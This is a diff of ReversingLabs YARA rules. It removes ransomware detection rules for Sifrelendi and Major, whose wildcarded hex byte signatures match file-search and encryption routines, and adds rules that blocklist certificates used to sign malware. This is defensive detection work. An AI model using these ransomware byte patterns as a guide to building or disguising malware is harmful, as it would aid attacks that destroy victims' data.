-		id = "b9083b7c-eb09-52da-a240-39b51df892f9"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "9265bb94-b183-523f-91bf-9bc76ab63d6b"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Sifrelendi.yara#L1-L67"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16044-L16060"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "430d3877c10c86fcb19b5624dd8886d61e54ccd0453678329309b49712c6d5c6"
+		logic_hash = "96269f41f82621aee029f343acfce70c781bf7713588dfe78fac35a3d1d3f7cd"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Sifrelendi"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files = {
-            E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
-            33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 85 ?? ?? ??
-            ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64
-            89 20 F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74
-            ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 8D ??
-            ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 EB
-            ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D
-            C3
-        }
-		$encrypt_files = {
-            55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 45 ?? E8 ??
-            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64
-            FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C9 B2 ?? A1 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B F8 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B C7 E8 ?? ?? ?? ?? 33 C9 B2
-            ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B C6 E8 ?? ?? ??
-            ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 8B 45
-            ?? 8B 10 FF 12 50 8B CB 8B 55 ?? 8B C6 E8 ?? ?? ?? ?? 8B C6 8B 10 FF 52 ?? 6A ?? 6A
-            ?? 8B C3 E8 ?? ?? ?? ?? 8B C3 8B 10 FF 12 50 8B 4D ?? 8B D3 8B C7 E8 ?? ?? ?? ?? 8B
-            C7 8B 10 FF 52 ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ??
-            E8 ?? ?? ?? ?? 8B C3 E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? 8D 45
-            ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 50 8B 45 ?? E8 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $search_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "21:4d:f5:9f:e5:38:74:cc:01:1d:d4:57:27:03:5f:51" and 1468800000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Major : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_37Ca4F66Fdcc8732992723199859886C : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Major ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0c85aff8-1fb5-5e47-ae49-72445a000eaa"
-		date = "2021-01-26"
-		modified = "2021-01-26"
+		id = "9dd87769-73d0-5299-b6ed-936703abc78e"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Major.yara#L1-L261"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16062-L16078"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "16fb7763e3806fca6937fef7e8b3d8bccd61cb39549061d359d630c7d266c270"
+		logic_hash = "190dffc36c17c27c43337d7914683b7bab3ff18a50de5278ed2a66f04b9e395d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Major"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 33 C0 89 4D ?? 57 50 66 89 45 ?? 8D 8D ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 57 C0 C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48
-            ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
-            8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84
-            0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 33 C9 8B F8 51 89 4D ?? 51 8D 4D ?? 89 7D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ??
-            8D 45 ?? 50 FF 77 ?? 57 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 47 ?? 89 4D ?? BB ?? ?? ??
-            ?? 8B 48 ?? 89 01 8B 07 8D 4D ?? 83 C0 ?? 3B C8 74 ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 8D 45 ?? 3B C6
-        }
-		$find_files_p2 = {
-            0F 84 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ??
-            ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ??
-            ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 7E ??
-            ?? 73 ?? 8B 46 ?? 83 C0 ?? 74 ?? 03 C0 50 8D 45 ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB
-            ?? 8B 06 89 45 ?? C7 06 ?? ?? ?? ?? 8B 46 ?? 89 45 ?? 8B 46 ?? 89 45 ?? C7 46 ?? ??
-            ?? ?? ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 36 33 C0 66 89 06 8B 45 ?? 83 F8
-            ?? 72 ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6
-            C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ??
-            ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 3F 8D 77 ?? 8B
-            4F ?? 8B 07 89 01 8B 0F 8B 47 ?? 89 41 ?? 8B 45 ?? 48 89 45 ?? 89 45 ?? 8B 46 ?? 83
-            F8 ?? 72 ?? 8B 0E 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6
-        }
-		$find_files_p3 = {
-            C1 ?? 0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ??
-            ?? ?? 83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ??
-            ?? 83 7E ?? ?? C7 46 ?? ?? ?? ?? ?? 72 ?? 8B 36 33 C0 57 66 89 06 E8 ?? ?? ?? ?? 83
-            C4 ?? 8D 8D ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B
-            F8 89 7D ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 66 66 66 0F 1F 84 00 ?? ?? ?? ?? 33 C0 C7 45
-            ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 0F 84 ?? ?? ??
-            ?? 8B 85 ?? ?? ?? ?? 8B 08 85 C9 74 ?? 8B 85 ?? ?? ?? ?? 8B 00 8D 14 41 EB ?? 8B 85
-            ?? ?? ?? ?? 8B 08 8B 85 ?? ?? ?? ?? 8B 00 8D 14 48 8B 85 ?? ?? ?? ?? 8B 08 2B D1 D1
-            FA 81 FA ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8D 04 12 3D ?? ?? ?? ?? 72 ?? F6 C1 ?? 0F 85
-            ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ?? 83 F9
-            ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00
-            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? 50 89 85 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72
-            ?? 8B 4D ?? 40 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 03 C0 3D ?? ?? ?? ?? 72 ?? F6 C1
-        }
-		$find_files_p4 = {
-            0F 85 ?? ?? ?? ?? 8B 41 ?? 3B C1 0F 83 ?? ?? ?? ?? 2B C8 83 F9 ?? 0F 82 ?? ?? ?? ??
-            83 F9 ?? 0F 87 ?? ?? ?? ?? 8B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68
-            ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 8B D4 33 C0 C7 42 ?? ?? ?? ?? ?? C7 42 ?? ?? ?? ?? ?? 66 89 02 66 39 85 ?? ?? ??
-            ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D 71 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B
-            CE D1 F9 51 8D 85 ?? ?? ?? ?? 8B CA 50 E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 85 C0
-            0F 84 ?? ?? ?? ?? 6A ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C7 45 ??
-            ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 CB ?? C7 45 ??
-            ?? ?? ?? ?? 66 89 45 ?? 66 39 85 ?? ?? ?? ?? 75 ?? 33 C9 EB ?? 8D 8D ?? ?? ?? ?? 8D
-            51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 8D 85 ?? ?? ?? ?? 50 8D 4D ??
-            E8 ?? ?? ?? ?? 8D 45 ?? 83 CB ?? 50 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
-            0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
-        }
-		$find_files_p5 = {
-            83 CB ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 CB ?? 50 8D 85 ??
-            ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83 CB ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 83 CB ?? 50 8D 45 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 85 C0 74 ??
-            C6 45 ?? ?? F6 C3 ?? 74 ?? 8B 45 ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ??
-            E8 ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? F6 C3 ??
-            74 ?? 8B 85 ?? ?? ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? 66 89 85 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8B 85 ?? ?? ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40
-            8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? F6 C3 ?? 74 ?? 8B 85 ?? ??
-            ?? ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 8D ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 33 C0 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 66 89 85 ?? ??
-            ?? ?? 8B 45 ?? 83 E3 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 33 C0
-        }
-		$find_files_p6 = {
-            C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 E3 ?? 8B 45 ?? C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 72
-            ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? 50 8D 4D ?? FF 76 ?? 56 E8 ?? ??
-            ?? ?? 8B 55 ?? B9 ?? ?? ?? ?? 2B CA 83 F9 ?? 0F 82 ?? ?? ?? ?? 89 46 ?? 42 8B 48 ??
-            89 55 ?? 89 01 E9 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ??
-            8D 45 ?? 50 8D 4D ?? FF 76 ?? 56 E8 ?? ?? ?? ?? 8B 55 ?? B9 ?? ?? ?? ?? 2B CA 83 F9
-            ?? 0F 82 ?? ?? ?? ?? 89 46 ?? 42 8B 48 ?? 89 55 ?? 89 55 ?? 89 01 8B 45 ?? 83 F8 ??
-            72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 54 E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 85 ?? ?? ?? ?? 8B CC 50 E8 ?? ?? ?? ?? 8B 75
-            ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 7D ??
-            8B CF E8 ?? ?? ?? ?? 8B 4D ?? 85 C9 74 ?? 8B 7D ?? E9 ?? ?? ?? ?? 8B 4D ?? 85 C9 0F
-            84 ?? ?? ?? ?? 0F 1F 00 8B 45 ?? 8D 4D ?? 8B 00 83 C0 ?? 3B C8 74 ?? 6A ?? 6A ?? 50
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4
-        }
-		$find_files_p7 = {
-            8D 45 ?? 3B C6 74 ?? 8B 4D ?? 83 F9 ?? 72 ?? 41 51 FF 75 ?? 8B C8 E8 ?? ?? ?? ?? 33
-            C0 C7 45 ?? ?? ?? ?? ?? 56 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ??
-            8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 8B 75
-            ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 0F 1F 00 33 C0 C7 45 ?? ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ??
-            6A ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF
-            75 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            8D 85 ?? ?? ?? ?? 83 EC ?? F6 85 ?? ?? ?? ?? ?? 8B CC 50 0F 84 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 5D ?? 8D 45 ?? 50 8D 4D ?? FF 73 ?? 53 E8 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            2B CE 83 F9 ?? 0F 82 ?? ?? ?? ?? 89 43 ?? 46 8B 48 ?? 89 75 ?? 89 01 8B 45 ?? 83 F8
-            ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 8D ?? ?? ?? ?? 54 E8 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 85 C0 74
-            ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B CF 50 E8 ?? ?? ?? ?? 8B
-            45 ?? 83 F8 ?? 72 ?? 40 8D 4D ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
-            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 85 F6 0F 85 ??
-            ?? ?? ?? FF 75 ?? FF 15
-        }
-		$encrypt_files_p1 = {
-            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
-            45 ?? 83 7D ?? ?? 0F 43 45 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 C0 C7 45 ?? ??
-            ?? ?? ?? 6A ?? 50 66 89 45 ?? 8D 4D ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F
-            43 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 89 45 ?? FF 15 ?? ?? ??
-            ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 8B 4D ?? 01 0D ?? ?? ?? ?? 8B 55 ?? 11 15 ?? ?? ?? ?? 83 FA ?? 0F 8C ?? ??
-            ?? ?? 7F ?? 85 C9 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 66 66 0F 1F 84 00
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85
-            FF 74 ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 8B 55 ?? 8B 4D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 C4 ?? 6A
-        }
-		$encrypt_files_p2 = {
-            50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 57 53 FF 15 ?? ?? ?? ??
-            8B 55 ?? 8B 4D ?? E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 56 8D 85
-            ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? F7 D8 6A ?? 6A ?? 50 53 FF 15 ??
-            ?? ?? ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? F2 0F 59 05 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 50 56 53 FF 15 ?? ?? ?? ?? 83 6D ?? ?? 0F 85 ?? ?? ?? ?? 57 E8 ?? ??
-            ?? ?? 56 E9 ?? ?? ?? ?? 8B F1 8B C2 81 C6 ?? ?? ?? ?? 83 D0 ?? 83 F8 ?? 0F 87 ?? ??
-            ?? ?? 72 ?? 81 FE ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? F2 0F
